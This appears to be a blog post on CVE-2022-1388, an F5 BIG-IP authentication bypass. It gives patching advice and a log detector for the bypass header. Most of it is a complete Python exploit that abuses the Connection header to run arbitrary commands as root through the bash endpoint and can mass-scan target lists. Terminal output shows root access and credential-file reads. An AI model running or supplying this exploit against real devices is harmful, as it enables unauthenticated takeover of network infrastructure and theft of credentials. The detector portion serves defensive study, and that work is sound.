F5 | CVE-2022-1388

A proof of concept (PoC) was developed for a critical vulnerability in F5's BIG-IP networking software that could expose thousands of devices to remote takeover.

The vulnerability, tracked as CVE-2022-1388, could allow an attacker to send undisclosed requests that bypass iControl REST authentication.

If exploited, an unauthenticated user can get remote code execution (RCE) on an affected device. 👽

Affected Devices

Everything older than version 17 is affected. Patches are available for BIG-IP versions 13 through 16; BIG-IP versions 11 and 12 are vulnerable with no patch available.

So what should you do?

Usually, I recommend patching first and later attending to the configuration issues. But in this case, I will swap this order: First, make sure you are not exposing the admin interface. If you can't manage that: Don't try patching. Turn off the device instead. If the configuration interface is safe: Patch!
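The PoC below lists X-F5-Auth-Token in the Connection header of its requests, which is the tell-tale of this bypass. As an added example that is not part of the original post, the following detector scans constructed access-log lines (in an assumed format, not a real F5 log format) for that pattern and ranks hits by whether the /mgmt/tm/util/bash endpoint answered 200.

```python
import re

# Constructed sample lines in an assumed format: client, timestamp, request line,
# status, then the client's Connection request header in quotes.
SAMPLE_LOG = [
    '203.0.113.10 [09/May/2022:10:01:02 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 "close, X-F5-Auth-Token, X-Forwarded-For"',
    '203.0.113.11 [09/May/2022:10:01:05 +0000] "GET /mgmt/tm/sys/version HTTP/1.1" 200 "keep-alive"',
    '203.0.113.12 [09/May/2022:10:02:00 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 401 "close"',
    '203.0.113.13 [09/May/2022:10:03:30 +0000] "GET /mgmt/tm/ltm/virtual HTTP/1.1" 200 "close, x-f5-auth-token"',
]

LINE_RE = re.compile(
    r'^(?P<client>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<connection>[^"]*)"$'
)

# A client has no legitimate reason to name the auth-token header as hop-by-hop.
SUSPECT_HOP_BY_HOP = {"x-f5-auth-token"}
SHELL_ENDPOINT = "/mgmt/tm/util/bash"

def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def classify(rec):
    """Return a finding dict when the Connection header carries the bypass token."""
    tokens = {t.strip().lower() for t in rec["connection"].split(",")}
    if not tokens & SUSPECT_HOP_BY_HOP:
        return None
    status = int(rec["status"])
    if rec["path"].startswith(SHELL_ENDPOINT) and status == 200:
        sev, why = "critical", "auth-token stripping plus successful bash endpoint call"
    elif status == 200:
        sev, why = "high", "auth-token stripping with successful iControl REST request"
    else:
        sev, why = "medium", "auth-token stripping attempt (request rejected)"
    return {"client": rec["client"], "path": rec["path"], "status": status,
            "severity": sev, "reason": why}

def scan(lines):
    """Return one finding per log line that shows the bypass pattern."""
    records = (parse_line(l) for l in lines)
    return [f for f in (classify(r) for r in records if r) if f]
```

Unparsable lines are skipped rather than trusted; feed the function your own export once the fields are mapped to the same names.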

import os
import sys
import argparse
import urllib3
import requests

# verify=False is used below; silence the resulting certificate warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Headers sent with every request
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
    "Content-type": "application/json",
    "Connection": "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
    "X-F5-Auth-Token": "anything",
    "Authorization": "Basic YWRtaW46"}

endpoint = "/mgmt/tm/util/bash"

def usage():
    print("Eg: \n    python3 -u")
    print("    python3 -u httts:// -c 'cat /etc/passwd'")
    print("    python3 -f urls.txt")

def poc(url):
    # Runs `id` and treats a root uid in the response as confirmation
    payload = {"command": "run", "utilCmdArgs": "-c id"}
    try:
        res = requests.post(url + endpoint, headers=headers, json=payload,
                            proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
            print("[+] {} is vulnerable!!!".format(url))
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: {}".format(url, e))
        return False

def exp(url, command):
    # Runs the supplied command and prints the command result returned by the endpoint
    payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
    try:
        res = requests.post(url + endpoint, headers=headers, json=payload,
                            proxies=None, timeout=15, verify=False)
        if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
            print(res.json().get("commandResult", ""))
            return True
        else:
            print("[-] {} is not vulnerable.".format(url))
            return False
    except Exception as e:
        print("[-] {} Exception: {}".format(url, e))
        return False

if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
    parser.add_argument('-u', '--url', type=str,
                        help="vulnerability verification for individual websites")
    parser.add_argument('-c', '--command', type=str,
                        help="command execution")
    parser.add_argument('-f', '--file', type=str,
                        help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
    args = parser.parse_args()
    if len(sys.argv) == 3:
        if sys.argv[1] in ['-u', '--url']:
            poc(args.url)
        elif sys.argv[1] in ['-f', '--file']:
            if os.path.isfile(args.file):
                with open(args.file) as target:
                    # one URL per line; blank lines are ignored
                    urls = [line.strip() for line in target if line.strip()]
                    for url in urls:
                        if poc(url):
                            with open("success.txt", "a+") as f:
                                f.write(url + "\n")
    elif len(sys.argv) == 5:
        if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
            exp(args.url, args.command)
    else:
        usage()


root@DRM:/tmp# python3 -u https://<ip-address>
[+] https://<ip-address> is vulnerable!!!

root@DRM:/tmp# python3 -u https://<ip-address> -c 'id'
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

root@DRM:/tmp# python3 -u https://<ip-address> -c 'cat /etc/shadow'

sha512: produces a 512-bit digest. The hashed password starts with $6$.

root@DRM:/tmp# python3 -u https://<ip-address> -c 'tmsh show sys hardware'

Chassis Information
  Maximum MAC Count  1
  Registration Key   -

Hardware Version Information
  Name        cpus
  Type        base-board
  Model       Intel Xeon Processor (Skylake, IBRS)
  Parameters  --            --
              cache size    4096 KB
              cores         24  (physical:24)
              cpu MHz       2194.838
              cpu sockets   24
              cpu stepping  4

  Name  BIG-IP Virtual Edition
  BIOS Revision
  Base MAC       52:54:00:xx:55:ba
  Hypervisor     KVM

System Information
  Type                       Z100
  Chassis Serial             191931f7-0dcb-4d7c-45xe
  Level 200/400 Part
  Switchboard Serial
  Switchboard Part Revision
  Host Board Serial
  Host Board Part Revision
